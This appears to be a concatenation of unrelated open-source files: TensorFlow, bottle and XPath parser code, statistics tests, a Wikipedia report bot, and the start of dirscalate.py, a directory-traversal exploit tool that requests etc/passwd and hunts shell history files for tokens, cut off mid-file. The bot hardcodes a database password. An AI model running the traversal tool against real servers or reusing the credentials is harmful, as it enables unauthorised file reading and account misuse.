collections=bias_collections,
regularizer=bias_regularizer,
trainable=trainable)
y = nn.bias_add(y, b)
if len(dims) > 2:
out_shape = array_ops.unpack(array_ops.shape(x))
out_shape[-1] = num_output_units
y = array_ops.reshape(y, array_ops.pack(out_shape))
static_shape = x.get_shape().as_list()
static_shape[-1] = num_output_units
y.set_shape(static_shape)
return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which remove the activation_fn parameter.
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)
# Simple alias.
conv2d = convolution2d
conv2d_transpose = convolution2d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
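# Sketch of how the aliases above are typically used (illustrative only;
# `images` and `features` are hypothetical input tensors):
#
#   net = conv2d(images, 64, [3, 3], scope='conv1')   # alias for convolution2d
#   logits = linear(features, 10, scope='logits')     # fully_connected, no activation
#   hidden = relu(features, 256, scope='fc1')         # fully_connected + nn.relu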
|
apache-2.0
| 7,947,719,514,058,417,000 | 42.465723 | 80 | 0.631842 | false |
adragomir/bottle
|
test/test_outputfilter.py
|
1
|
5031
|
# -*- coding: utf-8 -*-
'''Everything returned by Bottle()._cast() MUST be WSGI compatible.'''
import unittest
import bottle
from tools import ServerTestBase, tob, tobs
class TestOutputFilter(ServerTestBase):
''' Tests for WSGI functionality, routing and output casting (decorators) '''
def test_bytes(self):
self.app.route('/')(lambda: tob('test'))
self.assertBody('test')
def test_bytearray(self):
self.app.route('/')(lambda: map(tob, ['t', 'e', 'st']))
self.assertBody('test')
def test_tuple(self):
self.app.route('/')(lambda: ('t', 'e', 'st'))
self.assertBody('test')
def test_emptylist(self):
self.app.route('/')(lambda: [])
self.assertBody('')
def test_none(self):
self.app.route('/')(lambda: None)
self.assertBody('')
def test_illegal(self):
self.app.route('/')(lambda: 1234)
self.assertStatus(500)
self.assertInBody('Unhandled exception')
def test_error(self):
self.app.route('/')(lambda: 1/0)
self.assertStatus(500)
self.assertInBody('ZeroDivisionError')
def test_fatal_error(self):
@self.app.route('/')
def test(): raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, self.assertStatus, 500)
def test_file(self):
self.app.route('/')(lambda: tobs('test'))
self.assertBody('test')
def test_unicode(self):
self.app.route('/')(lambda: u'äöüß')
self.assertBody(u'äöüß'.encode('utf8'))
self.app.route('/')(lambda: [u'äö',u'üß'])
self.assertBody(u'äöüß'.encode('utf8'))
@self.app.route('/')
def test5():
bottle.response.content_type='text/html; charset=iso-8859-15'
return u'äöüß'
self.assertBody(u'äöüß'.encode('iso-8859-15'))
@self.app.route('/')
def test5():
bottle.response.content_type='text/html'
return u'äöüß'
self.assertBody(u'äöüß'.encode('utf8'))
def test_json(self):
self.app.route('/')(lambda: {'a': 1})
if bottle.json_dumps:
self.assertBody(bottle.json_dumps({'a': 1}))
self.assertHeader('Content-Type','application/json')
else:
print "Warning: No json module installed."
def test_custom(self):
self.app.route('/')(lambda: 5)
self.app.add_filter(int, lambda x: str(x))
self.assertBody('5')
def test_generator_callback(self):
@self.app.route('/')
def test():
bottle.response.headers['Test-Header'] = 'test'
yield 'foo'
self.assertBody('foo')
self.assertHeader('Test-Header', 'test')
def test_empty_generator_callback(self):
@self.app.route('/')
def test():
yield
bottle.response.headers['Test-Header'] = 'test'
self.assertBody('')
self.assertHeader('Test-Header', 'test')
def test_error_in_generator_callback(self):
@self.app.route('/')
def test():
yield 1/0
self.assertStatus(500)
self.assertInBody('ZeroDivisionError')
def test_fatal_error_in_generator_callback(self):
@self.app.route('/')
def test():
yield
raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, self.assertStatus, 500)
def test_httperror_in_generator_callback(self):
@self.app.route('/')
def test():
yield
bottle.abort(404, 'teststring')
self.assertInBody('teststring')
self.assertInBody('Error 404: Not Found')
self.assertStatus(404)
def test_httpresponse_in_generator_callback(self):
@self.app.route('/')
def test():
yield bottle.HTTPResponse('test')
self.assertBody('test')
def test_unicode_generator_callback(self):
@self.app.route('/')
def test():
yield u'äöüß'
self.assertBody(u'äöüß'.encode('utf8'))
def test_invalid_generator_callback(self):
@self.app.route('/')
def test():
yield 1234
self.assertStatus(500)
self.assertInBody('Unsupported response type')
def test_cookie(self):
""" WSGI: Cookies """
@bottle.route('/cookie')
def test():
bottle.response.COOKIES['a']="a"
bottle.response.set_cookie('b', 'b')
bottle.response.set_cookie('c', 'c', path='/')
return 'hello'
try:
c = self.urlopen('/cookie')['header'].get_all('Set-Cookie', '')
except:
c = self.urlopen('/cookie')['header'].get('Set-Cookie', '').split(',')
c = [x.strip() for x in c]
self.assertTrue('a=a' in c)
self.assertTrue('b=b' in c)
self.assertTrue('c=c; Path=/' in c)
if __name__ == '__main__': #pragma: no cover
unittest.main()
|
mit
| -7,577,298,989,531,907,000 | 30.588608 | 82 | 0.5556 | false |
emory-libraries/eulxml
|
eulxml/xpath/parserules.py
|
1
|
7468
|
# file eulxml/xpath/parserules.py
#
# Copyright 2010,2011 Emory University Libraries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""XPath parsing rules.
To understand how this module works, it is valuable to have a strong
understanding of the `ply <http://www.dabeaz.com/ply/>` module.
"""
from __future__ import unicode_literals
from eulxml.xpath import ast
from eulxml.xpath.lexrules import tokens
precedence = (
('left', 'OR_OP'),
('left', 'AND_OP'),
('left', 'EQUAL_OP'),
('left', 'REL_OP'),
('left', 'PLUS_OP', 'MINUS_OP'),
('left', 'MULT_OP', 'DIV_OP', 'MOD_OP'),
('right', 'UMINUS_OP'),
('left', 'UNION_OP'),
)
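# A minimal sketch of how these rules are compiled (assuming ply is installed;
# the eulxml.xpath package normally performs this wiring itself):
#
#   import ply.lex as lex
#   import ply.yacc as yacc
#   from eulxml.xpath import lexrules, parserules
#
#   lexer = lex.lex(module=lexrules)
#   parser = yacc.yacc(module=parserules)
#   tree = parser.parse('//foo[@bar="baz"]', lexer=lexer)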
#
# basic expressions
#
def p_expr_boolean(p):
"""
Expr : Expr OR_OP Expr
| Expr AND_OP Expr
| Expr EQUAL_OP Expr
| Expr REL_OP Expr
| Expr PLUS_OP Expr
| Expr MINUS_OP Expr
| Expr MULT_OP Expr
| Expr DIV_OP Expr
| Expr MOD_OP Expr
| Expr UNION_OP Expr
"""
p[0] = ast.BinaryExpression(p[1], p[2], p[3])
def p_expr_unary(p):
"""
Expr : MINUS_OP Expr %prec UMINUS_OP
"""
p[0] = ast.UnaryExpression(p[1], p[2])
#
# path expressions
#
def p_path_expr_binary(p):
"""
Expr : FilterExpr PATH_SEP RelativeLocationPath
| FilterExpr ABBREV_PATH_SEP RelativeLocationPath
"""
p[0] = ast.BinaryExpression(p[1], p[2], p[3])
def p_path_expr_unary(p):
"""
Expr : RelativeLocationPath
| AbsoluteLocationPath
| AbbreviatedAbsoluteLocationPath
| FilterExpr
"""
p[0] = p[1]
#
# paths
#
def p_absolute_location_path_rootonly(p):
"""
AbsoluteLocationPath : PATH_SEP
"""
p[0] = ast.AbsolutePath(p[1])
def p_absolute_location_path_subpath(p):
"""
AbsoluteLocationPath : PATH_SEP RelativeLocationPath
"""
p[0] = ast.AbsolutePath(p[1], p[2])
def p_abbreviated_absolute_location_path(p):
"""
AbbreviatedAbsoluteLocationPath : ABBREV_PATH_SEP RelativeLocationPath
"""
p[0] = ast.AbsolutePath(p[1], p[2])
def p_relative_location_path_simple(p):
"""
RelativeLocationPath : Step
"""
p[0] = p[1]
def p_relative_location_path_binary(p):
"""
RelativeLocationPath : RelativeLocationPath PATH_SEP Step
| RelativeLocationPath ABBREV_PATH_SEP Step
"""
p[0] = ast.BinaryExpression(p[1], p[2], p[3])
#
# path steps
#
def p_step_nodetest(p):
"""
Step : NodeTest
"""
p[0] = ast.Step(None, p[1], [])
def p_step_nodetest_predicates(p):
"""
Step : NodeTest PredicateList
"""
p[0] = ast.Step(None, p[1], p[2])
def p_step_axis_nodetest(p):
"""
Step : AxisSpecifier NodeTest
"""
p[0] = ast.Step(p[1], p[2], [])
def p_step_axis_nodetest_predicates(p):
"""
Step : AxisSpecifier NodeTest PredicateList
"""
p[0] = ast.Step(p[1], p[2], p[3])
def p_step_abbrev(p):
"""
Step : ABBREV_STEP_SELF
| ABBREV_STEP_PARENT
"""
p[0] = ast.AbbreviatedStep(p[1])
#
# axis specifier
#
def p_axis_specifier_full(p):
"""
AxisSpecifier : AXISNAME AXIS_SEP
"""
p[0] = p[1]
def p_axis_specifier_abbrev(p):
"""
AxisSpecifier : ABBREV_AXIS_AT
"""
p[0] = '@'
#
# node test
#
def p_node_test_name_test(p):
"""
NodeTest : NameTest
"""
p[0] = p[1]
def p_node_test_type_simple(p):
"""
NodeTest : NODETYPE OPEN_PAREN CLOSE_PAREN
"""
# NOTE: Strictly speaking p[1] must come from a list of recognized
# NodeTypes. Since we don't actually do anything with them, we don't
# need to recognize them.
p[0] = ast.NodeType(p[1])
def p_node_test_type_literal(p):
"""
NodeTest : NODETYPE OPEN_PAREN LITERAL CLOSE_PAREN
"""
# NOTE: Technically this only allows 'processing-instruction' for p[1].
# We'll go light on that restriction since we don't actually need it for
# processing.
p[0] = ast.NodeType(p[1], p[3])
#
# name test
#
def p_name_test_star(p):
"""
NameTest : STAR_OP
"""
p[0] = ast.NameTest(None, p[1])
def p_name_test_prefix_star(p):
"""
NameTest : NCNAME COLON STAR_OP
"""
p[0] = ast.NameTest(p[1], p[3])
def p_name_test_qname(p):
"""
NameTest : QName
"""
qname = p[1]
p[0] = ast.NameTest(qname[0], qname[1])
#
# qname
#
def p_qname_prefixed(p):
"""
QName : NCNAME COLON NCNAME
"""
p[0] = (p[1], p[3])
def p_qname_unprefixed(p):
"""
QName : NCNAME
"""
p[0] = (None, p[1])
def p_funcqname_prefixed(p):
"""
FuncQName : NCNAME COLON FUNCNAME
"""
p[0] = (p[1], p[3])
def p_funcqname_unprefixed(p):
"""
FuncQName : FUNCNAME
"""
p[0] = (None, p[1])
#
# filter expressions
#
def p_filter_expr_simple(p):
"""
FilterExpr : VariableReference
| LITERAL
| Number
| FunctionCall
"""
# FIXME: | FunctionCall moved so as not to conflict with NodeTest :
# FunctionCall
p[0] = p[1]
def p_filter_expr_grouped(p):
"""
FilterExpr : OPEN_PAREN Expr CLOSE_PAREN
"""
p[0] = p[2]
def p_filter_expr_predicate(p):
"""
FilterExpr : FilterExpr Predicate
"""
if not hasattr(p[1], 'append_predicate'):
p[1] = ast.PredicatedExpression(p[1])
p[1].append_predicate(p[2])
p[0] = p[1]
#
# predicates
#
def p_predicate_list_single(p):
"""
PredicateList : Predicate
"""
p[0] = [p[1]]
def p_predicate_list_recursive(p):
"""
PredicateList : PredicateList Predicate
"""
p[0] = p[1]
p[0].append(p[2])
def p_predicate(p):
"""
Predicate : OPEN_BRACKET Expr CLOSE_BRACKET
"""
p[0] = p[2]
#
# variable
#
def p_variable_reference(p):
"""
VariableReference : DOLLAR QName
"""
p[0] = ast.VariableReference(p[2])
#
# number
#
def p_number(p):
"""
Number : FLOAT
| INTEGER
"""
p[0] = p[1]
#
# funcall
#
def p_function_call(p):
"""
FunctionCall : FuncQName FormalArguments
"""
# FIXME: This production also matches NodeType() or
# processing-instruction("foo"), which are technically NodeTest
qname = p[1]
p[0] = ast.FunctionCall(qname[0], qname[1], p[2])
def p_formal_arguments_empty(p):
"""
FormalArguments : OPEN_PAREN CLOSE_PAREN
"""
p[0] = []
def p_formal_arguments_list(p):
"""
FormalArguments : OPEN_PAREN ArgumentList CLOSE_PAREN
"""
p[0] = p[2]
def p_argument_list_single(p):
"""
ArgumentList : Expr
"""
p[0] = [p[1]]
def p_argument_list_recursive(p):
"""
ArgumentList : ArgumentList COMMA Expr
"""
p[0] = p[1]
p[0].append(p[3])
#
# error handling
#
def p_error(p):
    # In some cases, p could actually be None.
    # However, the stack trace should have enough information to identify the problem.
raise RuntimeError("Syntax error at '%s'" % repr(p))
|
apache-2.0
| 4,975,221,762,441,156,000 | 19.293478 | 82 | 0.584226 | false |
PersianWikipedia/Database-reports
|
zzkootah.py
|
1
|
7721
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Reza(User:reza1615), 2011
# MIT license
import catlib ,pagegenerators
import wikipedia,urllib,gzip,codecs,re
import MySQLdb as mysqldb
import config,os
from datetime import timedelta,datetime
wikipedia.config.put_throttle = 0
wikipedia.put_throttle.setDelay()
internetoff=False #----------------------------------- without internet ------------------------
wikipedia.config.put_throttle = 0
wikipedia.put_throttle.setDelay()
text=u' '
file_content=u' '
now = datetime.now()
yesterday=str(now-timedelta(1)).replace('-','').split(' ')[0].strip()
todayup=u"'''بهروز شده توسط ربات در تاریخ''''': ~~~~~''\n\n"
titlechart=u'!رتبه!! صفحه!!برچسبها!!میانویکی!!تعداد پیوند به!! تعداد رده!!تعداد نگاره!!حجم صغحه (بایت){{سخ}}حجم کمتر از ۵۰۰ بایت رنگی نمایش داده میشود !!توضیحات دیگر'+u'\n|-\n'
uppage=todayup+u'\n{| class="wikitable sortable"\n'+titlechart
downpage=u'\n|}\n[[رده:ویکیپدیا]]\n[[رده:آمارهای دیتابیس]]\n'
count=0
lines=u' '
#------------------------------------------------------------ sql part
siteq = wikipedia.getSite("fa")
query = open("/home/reza/pywikipedia/koochak.sql").read()
#wikipedia.output(u'Executing query:\n%s' % query)
conn = mysqldb.connect("fawiki.labsdb.org",
user = 'reza',
passwd = 'reza1615')
cursor = conn.cursor()
#query = query.encode(site.encoding())
cursor.execute(query)
results = cursor.fetchall()
#------------------------------sql finish------------------
def condition(link):
wikipedia.config.put_throttle = 0
wikipedia.put_throttle.setDelay()
if internetoff==True:
return u'||\n|-\n'
alarm=' '
try:
pagef = wikipedia.Page( wikipedia.getSite( u'fa' ),link )
wikipedia.output( u'opening %s ...' % pagef.title() )
text = pagef.get()
alarm+=u' '
objective=u'||'
  #----------------------------------------------references-------------------
if text.find(u'{{منبع')!=-1:
alarm+=u'بدون منبع ،'
if text.find(u'{{حذف')!=-1:
alarm+=u'حذف،'
if text.find(u'{{بهبود')!=-1:
alarm+=u'بهبود منبع ،'
if text.find(u'{{بدون منبع')!=-1:
alarm+=u'بدون منبع ،'
if text.find(u'{{متخصص')!=-1:
alarm+=u'متخصص ،'
if text.find(u'{{نوشتار خوب}}')!=-1:
alarm+=u'{{قلم رنگ|سورمهای|فیلی|مقاله خوب}}'
if text.find(u'{{پیشنهاد برگزیدگی}}')!=-1:
alarm+=u'{{قلم رنگ|بنفش|زرد|پیشنهاد برگزیدگی}}'
if text.find(u'{{پیشنهاد خوبیدگی}}')!=-1:
alarm+=u'{{قلم رنگ|سبز|زرد|پیشنهاد خوبیدگی}}'
if text.find(u'{{مقاله برگزیده}}')!=-1:
alarm+=u'{{قلم رنگ|سفید|خاکستری|مقاله برگزیده}}'
  #---------------------------------------------- stub ----------------------
if text.find(u'خرد}}')!=-1:
if text.find(u'{{بخش-خرد')!=-1:
alarm+=u'{{قلم رنگ|بنفش||بخش خرد}} ،'
else:
alarm+=u'خرد ،'
if text.find(u'نیاز}}')!=-1:
alarm+=u'نیازمند به ،'
if text.find(u'{{طرفداری')!=-1:
alarm+=u'عدمبیطرفی ،'
if text.find(u'{{درستی')!=-1:
alarm+=u'عدم توافق در درستی ،'
if text.find(u'{{ادغام')!=-1:
alarm+=u'ادغام ،'
if text.find(u'{{در دست ویرایش')!=-1:
alarm+=u'ویرایش ،'
if text.find(u'{{ویکیسازی')!=-1:
alarm+=u'ویکیسازی ،'
if text.find(u'{{تمیزکاری')!=-1:
alarm+=u'تمیزکاری ،'
if text.find(u'{{لحن')!=-1:
alarm+=u'لحن ،'
if text.find(u'{{اصلاح')!=-1:
alarm+=u'نیازمند ترجمه ،'
if text.find(u'{{ابهامزدایی')!=-1:
alarm+=u'ابهامزدایی ،'
if text.find(u'{{بازنویسی')!=-1:
alarm+=u'بازنویسی ،'
if text.find(u'{{به روز رسانی')!=-1:
alarm+=u'بهروز رسانی ،'
if text.find(u'{{بهروز رسانی')!=-1:
alarm+=u'بهروز رسانی ،'
#--------------------------------------------------------------------------
if alarm[-1]==u'،':
alarm=alarm[0:-1].strip()
interwikis=u'{{subst:formatnum:'+str(len(pagef.interwiki()) ).strip()+u'}}'
cats=u'{{subst:formatnum:'+str(len(pagef.categories(api=True))).strip()+u'}}'
linked=u'{{subst:formatnum:'+str(len(pagef.linkedPages())).strip()+u'}}'
image=u'{{subst:formatnum:'+str(len(pagef.imagelinks())).strip()+u'}}'
alarm+=u'||'+interwikis+u'||'+linked+u'||'+cats+u'||'+image+u'||{{حجم مقاله|'+pagef.title().strip()+u'|500}}||\n|-\n'
return alarm
except wikipedia.IsRedirectPage:
return False
except:
return False
savetext,rowfa,rowfaend=u' ',u' ',u' '
count=0
for row in results:
passport=True
line=unicode(row[0],'UTF-8')
wikipedia.output(line)
blacklists=[u'۰',u'۱',u'۲',u'۳',u'۴',u'۵',u'۶',u'۷',u'۸',u'۹']
for item in blacklists:
if line.find(item)!=-1:
passport=False
break
if passport:
conditions=condition(line.replace(u'_',u' '))
if conditions:
count+=1
text+=u'|{{subst:formatnum:'+str(count)+u'}}||{{مقاله|'+line.replace(u'_',u' ').strip()+u'}}||'+conditions
if count==500 or count==1000 or count==1500:
text=uppage+text.strip()+downpage
#---------------------------------------------------------wiki upload----------------------
countf=str(count).replace(u'0',u'۰').replace(u'1',u'۱').replace(u'2',u'۲').replace(u'3',u'۳').replace(u'4',u'۴').replace(u'5',u'۵').replace(u'6',u'۶').replace(u'7',u'۷').replace(u'8',u'۸').replace(u'9',u'۹')
countl=str(count-499).replace(u'0',u'۰').replace(u'1',u'۱').replace(u'2',u'۲').replace(u'3',u'۳').replace(u'4',u'۴').replace(u'5',u'۵').replace(u'6',u'۶').replace(u'7',u'۷').replace(u'8',u'۸').replace(u'9',u'۹')
uptitle=u'ویکیپدیا:گزارش دیتابیس/فهرست مقالههای کوتاه از %s تا %s/فهرست' %(countl,countf)
#uptitle=u'کاربر:Reza1615/test07'+str(count)
pagefa = wikipedia.Page( wikipedia.getSite( u'fa' ),uptitle)
pagefa.put(text, u'ربات:بهروز رسانی', minorEdit = True)
del text
text=u' '
sign_page=u'ویکیپدیا:گزارش دیتابیس/فهرست مقالههای کوتاه/امضا'
madak=u'~~~~~'
site=wikipedia.getSite('fa')
sign_page=wikipedia.Page(site,sign_page)
sign_page.put(madak,u'ربات:تاریخ بروز رسانی')
|
mit
| -4,913,412,699,687,561,000 | 44.486486 | 234 | 0.486337 | false |
cadappl/krep
|
krep_subcmds/topic_subcmd.py
|
1
|
2707
|
import re
from topics import all_topics, SubCommand
class TopicSubcmd(SubCommand):
COMMAND = 'topic'
help_summary = 'Print the topic summaries'
help_usage = '''\
%prog <topic> ...
Display all registered topics of the program for debugging purpose.
Topic contains the classes that can be imported from "topics", which
is the official way to use by the implemented sub-commands.
Environment variables KREP_EXTRA_PATH and KREP_TOPIC_PATH could define
new external sub-commands. Try to define the variables if required.'''
@staticmethod
def _print_formatted_topic(topics, print_name=True):
lines = list()
topfmt = '%(summary)s'
if print_name:
longest = max([len(topic) for topic in topics])
topfmt = ' %%(name)-%ds%%(summary)s' % (longest + 2)
for name in topics:
value = dict()
if print_name:
value['name'] = name
summary = ((all_topics[name] or '').split('\n'))[0].strip('.')
while len(summary) > 60:
splits = re.split(r'\s+', summary.strip())
if len(splits) > 1:
summary = ' '.join(splits[:-1]) + '...'
else:
summary = summary[:57] + '...'
value['summary'] = summary or 'No description'
lines.append(topfmt % value)
if len(lines) > 0:
lines.sort()
print('\n'.join(lines))
def _print_all_topics(self): # pylint: disable=R0201
print('The topics of krep are:')
print('')
TopicSubcmd._print_formatted_topic(all_topics.keys())
print('\nSee more info with "krep topic <topic>"')
def _print_topic(self, topics): # pylint: disable=R0201
aliases = dict()
for name in all_topics.keys():
alias = ''
for i in range(len(name)):
if 'A' <= name[i] <= 'Z':
alias += '_'
alias += name[i].lower()
aliases[name] = name
aliases[alias.lstrip('_')] = name
topics = list(topics)
for topic in topics[:]:
topics.remove(topic)
if topic not in aliases:
print('krep: "%s" is not a known topic' % topic)
else:
topics.append(aliases[topic])
if len(topics) > 1:
TopicSubcmd._print_formatted_topic(topics)
elif len(topics) == 1:
print(all_topics[topics[0]])
def execute(self, options, *args): # pylint: disable=W0613
if len(args) == 0 or 'all' in args:
self._print_all_topics()
else:
self._print_topic(args)
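# Example invocations (a sketch; the actual topic names depend on what the
# "topics" module exports):
#
#   krep topic                # list all registered topics with one-line summaries
#   krep topic SubCommand     # print the full docstring of one topic
#   krep topic sub_command    # the underscored alias resolves to SubCommand too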
|
lgpl-3.0
| 8,216,177,758,233,503,000 | 30.114943 | 74 | 0.533801 | false |
c-PRIMED/puq
|
test/UniformPDF_test.py
|
1
|
4485
|
#! /usr/bin/env python
'''
Testsuite for the UniformPDF class
'''
from __future__ import absolute_import, division, print_function
import numpy as np
from puq import *
import scipy.stats as stats
def _hisplot(y, nbins):
n, bins = np.histogram(y, nbins, normed=True)
mids = bins[:-1] + np.diff(bins) / 2.0
return mids, n
def compare_curves(x1, y1, x2, y2, **args):
ay = np.interp(x2, x1, y1)
rmse = np.sqrt(np.sum((ay - y2)**2))
print("maximum difference is", np.max(np.abs(ay - y2)))
print("RMSE=%s" % rmse)
# assert rmse < .002
assert np.allclose(ay, y2, **args)
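# The tests below follow one pattern (sketch, with illustrative numbers): draw
# samples from the PDF, histogram them with _hisplot, then compare the empirical
# curve against the analytic scipy.stats density using compare_curves, e.g.:
#
#   c = UniformPDF(min=0, max=1)
#   dx, dy = _hisplot(c.random(100000), 20)
#   compare_curves(dx, stats.uniform(0, 1).pdf(dx), dx, dy, atol=.02)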
def _test_updf(min, max):
options['pdf']['samples'] = 1000
c = UniformPDF(min=min, max=max)
assert isinstance(c, PDF)
x = c.x
y = stats.uniform(min, max-min).pdf(x)
rmse = np.sqrt(np.sum((c.y - y)**2))
print("RMSE=%s" % rmse)
print("MaxError=", np.max(abs(c.y - y)))
assert rmse < 1e-11
def _test_ucdf(min, max):
options['pdf']['samples'] = 1000
c = UniformPDF(min=min, max=max)
cdfy = stats.uniform(min, max-min).cdf(c.x)
rmse = np.sqrt(np.sum((c.cdfy - cdfy)**2))
print("RMSE=%s" % rmse)
print("MaxError=", np.max(abs(c.cdfy - cdfy)))
assert rmse < 1e-11
"""
import matplotlib.pyplot as plt
plt.plot(c.x, c.cdfy, color='green')
plt.plot(c.x, cdfy, color='red')
plt.show()
"""
# test mean, min, max and deviation
def _test_uniform_minmeanmax(min, mean, max):
c = UniformPDF(min=min, mean=mean, max=max)
cmin, cmax = c.range
print("min=%s mean=%s max=%s" % (cmin, c.mean, cmax))
if min is not None:
assert min == cmin
else:
assert cmin == mean - (max - mean)
if max is not None:
assert max == cmax
else:
assert cmax == mean + (mean - min)
if mean is not None:
assert np.allclose(mean, c.mean)
else:
assert np.allclose(c.mean, (min + max) / 2.0)
# test lhs()
def _test_uniform_lhs(min, max):
c = UniformPDF(min=min, max=max)
# test the lhs() function to see if the curve it generates is
# close enough
data = c.ds(10000)
assert len(data) == 10000
assert np.min(data) >= min
assert np.max(data) <= max
dx, dy = _hisplot(data, 20)
x = dx
y = stats.uniform(min, max-min).pdf(x)
compare_curves(x, y, dx, dy, atol=.0001)
"""
import matplotlib.pyplot as plt
plt.plot(x, y, color='red')
plt.plot(dx, dy, color='blue')
plt.show()
"""
assert np.allclose(c.mean, np.mean(data), rtol=.001), 'mean=%s' % np.mean(data)
# test lhs1()
def _test_uniform_lhs1(min, max):
c = UniformPDF(min=min, max=max)
data = c.ds1(1000)
xs = data
assert len(xs) == 1000
    assert (min, max) == c.range
# scale [-1,1] back to original size
mean = (min + max)/2.0
xs *= max - mean
xs += mean
dx, dy = _hisplot(xs, 20)
x = dx
y = stats.uniform(min, max-min).pdf(x)
compare_curves(x, y, dx, dy, atol=.001)
"""
import matplotlib.pyplot as plt
plt.plot(x, y, color='green')
plt.plot(dx, dy, color='blue')
plt.show()
"""
assert np.allclose(c.mean, np.mean(data), rtol=.001), 'mean=%s' % np.mean(data)
def _test_uniform_random(min, max):
c = UniformPDF(min=min, max=max)
data = c.random(1000000)
assert len(data) == 1000000
dx, dy = _hisplot(data, 20)
x = dx
y = stats.uniform(min, max-min).pdf(x)
compare_curves(x, y, dx, dy, atol=.02)
assert np.min(data) >= min
assert np.max(data) <= max
"""
import matplotlib.pyplot as plt
plt.plot(dx, dy, color='red')
plt.plot(x, y, color='blue')
plt.show()
"""
assert np.allclose(c.mean, np.mean(data), rtol=.001), 'mean=%s' % np.mean(data)
def test_updf():
_test_updf(10,20)
_test_updf(-20,-10)
def test_ucdf():
_test_ucdf(100,105)
_test_ucdf(-1,2)
def test_uniform_minmeanmax():
_test_uniform_minmeanmax(0,None,20)
_test_uniform_minmeanmax(None,0.5,2)
_test_uniform_minmeanmax(5,10,15)
_test_uniform_minmeanmax(5,10,None)
def test_uniform_lhs():
_test_uniform_lhs(10,20)
_test_uniform_lhs(-100, -50)
def test_uniform_lhs1():
_test_uniform_lhs1(10,20)
_test_uniform_lhs1(-100, -50)
def test_uniform_random():
_test_uniform_random(10,20)
if __name__ == "__main__":
test_updf()
test_ucdf()
test_uniform_minmeanmax()
test_uniform_lhs()
test_uniform_lhs1()
test_uniform_random()
|
mit
| 1,280,009,626,194,173,200 | 22.118557 | 83 | 0.584392 | false |
codewatchorg/dirscalate
|
dirscalate.py
|
1
|
7428
|
# Josh Berry
# CodeWatch
# December 2013
#
import re
import argparse
import StringIO
import datetime
import requests
from requests.auth import HTTPBasicAuth
from requests.auth import HTTPDigestAuth
from requests_ntlm import HttpNtlmAuth
parser = argparse.ArgumentParser(prog='dirscalate.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Exploit a directory traversal vulnerability to find sensitive information',
epilog='Example: dirscalate.py --link https://www.victim.com/login.php?test=1&blah=#vulnerability#&id=2 --histfile histfile.txt --tokens tokens.txt --depth 10 --type standard')
parser.add_argument('--link',
required=True,
    help='the full URL to exploit, replace value in vulnerable parameter with #vulnerability# marker (must include http(s)://)')
parser.add_argument('--histfile',
default='histfile.txt',
help='the list of history files to search')
parser.add_argument('--tokens',
default='tokens.txt',
help='the list of strings to search for in the history files')
parser.add_argument('--logfile',
default='dirscalate.txt',
help='the logfile to write matches to')
parser.add_argument('--depth',
default=10,
type=int,
help='the length of the traversal attempt')
parser.add_argument('--type',
default=1,
type=int,
help='1 (../), 2 (URL encoded), or 3 (double encoded)')
parser.add_argument('--ntlmuser',
default=None,
help='use NTLM authentication with this username (format of domain \\ username)')
parser.add_argument('--ntlmpass',
default=None,
help='use NTLM authentication with this password')
parser.add_argument('--basicuser',
default=None,
help='use BASIC authentication with this username')
parser.add_argument('--basicpass',
default=None,
help='use BASIC authentication with this password')
parser.add_argument('--digestuser',
default=None,
help='use DIGEST authentication with this username')
parser.add_argument('--digestpass',
default=None,
help='use DIGEST authentication with this password')
parser.add_argument('--cookie',
default=None,
help='use a previously established sessions cookie')
parser.set_defaults(histfile='histfile.txt', tokens='tokens.txt', logfile='dirscalate.txt', depth=10, type=1)
# Stick arguments in a variable
args = vars(parser.parse_args())
separator = ''
req = ''
session = requests.Session()
cookies = {}
# BUild the depth of the traversal for the link
def buildTraversal(depth, type):
traversal = ''
for x in range(0, depth):
traversal += type
return traversal
# Add the traversal to the link
def createLink(link, traversal):
traverseLink = re.sub('#vulnerability#', traversal, link)
return traverseLink
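# For example (illustrative values only), with --depth 3 and --type 1 the two
# helpers combine like this:
#
#   buildTraversal(3, '../') -> '../../../'
#   createLink('http://victim/x.php?f=#vulnerability#', '../../../etc/passwd')
#     -> 'http://victim/x.php?f=../../../etc/passwd'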
# Write matches to a log file
def writeLog(alert):
logfile = open(args['logfile'], 'a')
logTime = str(datetime.datetime.now())
logfile.write(logTime+': '+alert+'\n')
logfile.close()
# Select the traversal type
traverseType = ''
if args['type'] == 3:
traverseType = '%252e%252e%252f'
separator = '%252f'
elif args['type'] == 2:
traverseType = '%2e%2e%2f'
separator = '%2e%2e%2f'
else:
traverseType = '../'
separator = '/'
passwd = 'etc'+separator+'passwd'
# Build the malicious link
traversal = buildTraversal(args['depth'], traverseType)+passwd
newLink = createLink(args['link'], traversal)
# Load the history file
history = open(args['histfile'])
print '[*] Attempting exploit on: '+newLink
# Check to see if BASIC/DIGEST/NTLM/Cookie authentication is being performed
# If so, pass credentials to the session; if not, just request the traversal URL
if args['ntlmuser'] is not None and args['ntlmpass'] is not None:
session.auth = HttpNtlmAuth(args['ntlmuser'],args['ntlmpass'], session)
req = session.get(newLink, verify=False)
elif args['basicuser'] is not None and args['basicpass'] is not None:
session.auth = HTTPBasicAuth(args['basicuser'],args['basicpass'])
req = session.get(newLink, verify=False)
elif args['digestuser'] is not None and args['digestpass'] is not None:
session.auth = HTTPDigestAuth(args['digestuser'],args['digestpass'])
req = session.get(newLink, verify=False)
elif args['cookie'] is not None:
 # Check to see if the cookie has a semicolon, if so there might be multiple cookies
if re.search(';', args['cookie']):
cookielist = args['cookie'].split(';')
# Loop through list of cookies
for dircookies in cookielist:
